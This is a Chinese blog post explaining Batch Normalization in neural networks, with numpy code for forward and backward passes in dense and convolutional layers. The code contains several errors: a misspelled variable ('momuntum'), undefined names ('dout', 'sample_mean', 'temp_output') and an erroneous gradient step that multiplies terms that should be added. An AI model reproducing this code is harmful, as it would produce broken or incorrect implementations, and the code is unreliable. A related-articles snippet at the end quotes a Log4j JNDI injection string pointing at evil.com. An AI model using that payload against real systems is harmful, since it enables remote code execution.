BN介绍:卷积神经网络中的BatchNorm

在这里插入图片描述

一、BN介绍

1.原理

在机器学习中让输入的数据之间相关性越少越好,最好输入的每个样本都是均值为0方差为1。在输入神经网络之前可以对数据进行处理让数据消除共线性,但是这样的话输入层的激活层看到的是一个分布良好的数据,但是较深的激活层看到的的分布就没那么完美了,分布将变化的很严重。这样会使得训练神经网络变得更加困难。所以添加BatchNorm层,在训练的时候BN层使用batch来估计数据的均值和方差,然后用均值和方差来标准化这个batch的数据,并且随着不同的batch经过网络,均值和方差都在做累计平均。在测试的时候就直接作为标准化的依据。

这样的方法也有可能导致降低神经网络的表示能力,因为某些层的全局最优的特征可能不是均值为0或者方差为1的。所以BN层也是能够进行学习每个特征维度的缩放gamma和平移beta的来避免这样的情况。

2.BN层前向传播

def batchnorm_forward(x, gamma, beta, bn_param):"""先进行标准化再进行平移缩放running_mean = momentum * running_mean + (1 - momentum) * sample_meanrunning_var = momentum * running_var + (1 - momentum) * sample_varInput:- x: (N, D) 输入的数据- gamma: (D,) 每个特征维度数据的缩放- beta: (D,) 每个特征维度数据的偏移- bn_param: 字典,有如下键值:- mode: 'train'/'test' 必须指定- eps: 一个常量为了维持数值稳定,保证不会除0- momentum: 动量- running_mean: (D,) 积累的均值- running_var: (D,) 积累的方差Returns:- out: (N,D)- cache: 反向传播时需要的数据"""mode = bn_param['mode']eps = bn_param.get('eps', 1e-5)momentum = bn_param.get('momentum', 0.9)N, D = x.shaperunning_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))out, cache = None, Noneif mode == 'train':sample_mean = np.mean(x, axis=0)sample_var = np.var(x, axis=0)# 先标准化x_hat = (x - sample_mean)/(np.sqrt(sample_var + eps))# 再做缩放偏移out = gamma * x_hat + betacache = (gamma, x, sample_mean, sample_var, eps, x_hat)running_mean = momentum * running_mean + (1-momuntum)*sample_meanrunning_var = momentum * running_var + (1-momentum)*sample_varelif mode == 'test':# 先标准化#x_hat = (x - running_mean)/(np.sqrt(running_var+eps))# 再做缩放偏移#out = gamma * x_hat + beta# 或者是下面的骚写法scale = gamma/(np.sqrt(running_var + eps))out = x*scale + (beta - running_mean*scale)else:raise ValueError('Invalid forward batchnorm mode "%s"' % mode)bn_param['running_mean'] = running_meanbn_param['running_var'] = running_varreturn out, cache

3.BN层反向传播

def batchnorm_barckward(out, cache):"""反向传播的简单写法,易于理解Inputs:- dout: (N,D) dloss/dout- cache: (gamma, x, sample_mean, sample_var, eps, x_hat)Returns:- dx: (N,D)- dgamma: (D,) 每个维度的缩放和平移参数不同- dbeta: (D,)"""dx, dgamma, dbeta = None, None, None# unpack cachegamma, x, u_b, sigma_squared_b, eps, x_hat = cacheN = x.shape[0]dx_1 = gamma * dout # dloss/dx_hat = dloss/dout * gamma (N, D)dx_2_b = np.sum((x - u_b) * dx_1, axis=0)dx_2_a = ((sigma_squared_b + eps)**-0.5)*dx_1dx_3_b = (-0.5) * ((sigma_squared_b + eps)**-1.5)*dx_2_bdx_4_b = dx_3_b * 1dx_5_b = np.ones_like(x)/N * dx_4_bdx_6_b = 2*(x-u_b)*dx_5_bdx_7_a = dx_6_b*1 + dx_2_a*1dx_7_b = dx_6_b*1 * dx_2_a*1dx_8_b = -1*np.sum(dx_7_b, axis=0)dx_9_b = np.ones_like(x)/N * dx_8_bdx_10 = dx_9_b + dx_7_adgamma = np.sum(x_hat * dout, axis=0)dbeta = np.sum(dout, axis=0)dx = dx_10return dx, dgamma, dbeta

下面是直接使用公式来计算:

def batchnorm_backward_alt(dout, cache):dx, dgamma, dbeta = None, None, None# unpack cachegamma, x, u_b, sigma_squared_b, eps, x_hat = cacheN = x.shape[0]dx_hat = dout * gammadvar = np.sum(dx_hat* (x - sample_mean) * -0.5 * np.power(sample_var + eps, -1.5), axis = 0)dmean = np.sum(dx_hat * -1 / np.sqrt(sample_var +eps), axis = 0) + dvar * np.mean(-2 * (x - sample_mean), axis =0)dx = 1 / np.sqrt(sample_var + eps) * dx_hat + dvar * 2.0 / N * (x-sample_mean) + 1.0 / N * dmeandgamma = np.sum(x_hat * dout, axis = 0)dbeta = np.sum(dout , axis = 0)return dx, dgamma, dbeta

4.BN有什么作用

  1. 对于不好的权重初始化有更高的鲁棒性,仍然能得到较好的效果。
  2. 能更好的避免过拟合。
  3. 解决梯度消失/爆炸问题,BN防止了前向传播的时候数值过大或者过小,这样就能让反向传播时梯度处于一个较好的区间内。

二、卷积神经网络中的BN

1.前向传播

def spatial_batchnorm_forward(x, gamma, beta, bn_param):"""利用普通神经网络的BN来实现卷积神经网络的BNInputs:- x: (N, C, H, W)- gamma: (C,)缩放系数- beta: (C,)平移系数- bn_param: 包含如下键的字典- mode: 'train'/'test'必须的键- eps: 数值稳定需要的一个较小的值- momentum: 一个常量,用来处理running mean和var的。如果momentum=0 那么之前不利用之前的均值和方差。momentum=1表示不利用现在的均值和方差,一般设置momentum=0.9- running_mean: (C,)- running_var: (C,)Returns:- out: (N, C, H, W)- cache: 反向传播需要的数据,这里直接使用了普通神经网络的cache"""N, C, H, W = x.shape# transpose之后(N, W, H, C) channel在这里就可以看成是特征temp_out, cache = batchnorm_forward(x.transpose(0, 3, 2, 1).reshape((N*H*W, C)), gamma, beta, bn_param)# 再恢复shapeout = temp_output.reshape(N, W, H, C).transpose(0, 3, 2, 1)return out, cache

2.反向传播

def spatial_batchnorm_backward(dout, cache):"""利用普通神经网络的BN反向传播实现卷积神经网络中的BN反向传播Inputs:- dout: (N, C, H, W) 反向传播回来的导数- cache: 前向传播时的中间数据Returns:- dx: (N, C, H, W)- dgamma: (C,) 缩放系数的导数- dbeta: (C,) 偏移系数的导数"""dx, dgamma, dbeta = None, None, NoneN, C, H, W = dout.shape# 利用普通神经网络的BN进行计算 (N*H*W, C)channel看成是特征维度dx_temp, dgamma, dbeta = batchnorm_backward_alt(dout.transpose(0, 3, 2, 1).reshape((N*H*W, C)), cache)# 将shape恢复dx = dx_temp.reshape(N, W, H, C).transpose(0, 3, 2, 1)return dx, dgamma, dbeta

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/478042.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

防御保护——综合实验

拓扑图 实验需求: 1.Fw1和Fw2组成主备模式的双机热备 2.DMZ区存在两台服务器,现在要求生产区的设备仅能在办公时间(9:00-18:00)访问,办公区的设备全天都可以访问。 3.办公区设备可以通过电信链路和移动链路上网(多对多…

MSS与cwnd的关系,rwnd又是什么?

慢启动算法是指数递增的 这种指数增长的方式是慢启动算法的一个核心特点,它确保了TCP连接在开始传输数据时能够快速地探测网络的带宽容量,而又不至于过于激进导致网络拥塞。具体来说: 初始阶段:当TCP连接刚建立时,拥…

FreeRTOS移植到GD32

目录 一、GD32基础工程创建: 1、创建如下文件夹 2、在keil5创建工程 3、在工程添加相关.c文件和头文件路径 4、实例:实现LED闪烁功能 二、在基础工程添加FreeRTOS: 1、FreeRTOS中的文件: 2、添加的源文件: 3、添加的头文件路径: 4、…

Stackoverflow(1)-根据RequestBody的内容来区分使用哪个资源

如果使用Spring,可以通过RequestBody将请求体的json转换为Java对象,但如果URI相同,而请求体的内容不同,应该怎么办?问题来源(stackoverflow):Spring RequestBody without using a pojo?稍微研究了一下&…

Slack 给平台加入了 AI 驱动的搜索和总结功能

每周跟踪AI热点新闻动向和震撼发展 想要探索生成式人工智能的前沿进展吗?订阅我们的简报,深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同,从行业内部的深度分析和实用指南中受益。不要错过这个机会,成为AI领…

面向对象 设计原则

0 引言 单一职责原则:类应该只有一个改变的理由; 开放-封闭原则:类应该对扩展开放,对修改关闭; 迪米特原则:只和朋友交谈; 里氏替换原则:子类可以扩展父类的功能,但不能…

picker选择器-年月日选择

从底部弹起的滚动选择器。支持五种选择器,通过mode来区分,分别是普通选择器,多列选择器,时间选择器,日期选择器,省市区选择器,默认是普通选择器。 学习一下日期选择器 平台差异说明 日期选择默…

0219作业

作业1 求两个数最大公约数 .text 文本段 .global _start 声明一个全局的_start函数 _start: 汇编的入口mov r0,#0x9mov r1,#0xfloop:cmp r0,r1 比较r0,r1beq stop 相等subhi r0,r0,r1 subcc r1,r1,r0b loopstop: 标签b stop 跳转到stop标签下的第一条指令进行执行 while…

CI/CD部署

什么是CI,什么是CD CI和CD是软件开发中持续集成和持续交付的缩写。 CI代表持续集成(Continuous Integration),是一种实践,旨在通过自动化构建、测试和代码静态分析等过程,频繁地将代码变更合并到共享存储…

vulhub中Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。…

在ubuntu20.04 上配置 qemu/kvm linux kernel调试环境

一:安装qemu/kvm 和 virsh qemu/kvm 是虚拟机软件,virsh是管理虚拟机的命令行工具,可以使用virsh创建,编辑,启动,停止,删除虚拟机。 (1):安装之前&#xff0c…

unity学习(14)——组装服务器环境

工具-获取工具和功能 vs2022中已经自带了 下载网址 NuGet Gallery | Microsoft.NETFramework.ReferenceAssemblies 1.0.3 后来发现微软已经不再支持4.0版本,还是自己从头组装服务器吧。 先给vs2022新增这个模块,4.38G大小还是可以接受的。 安装完之后就…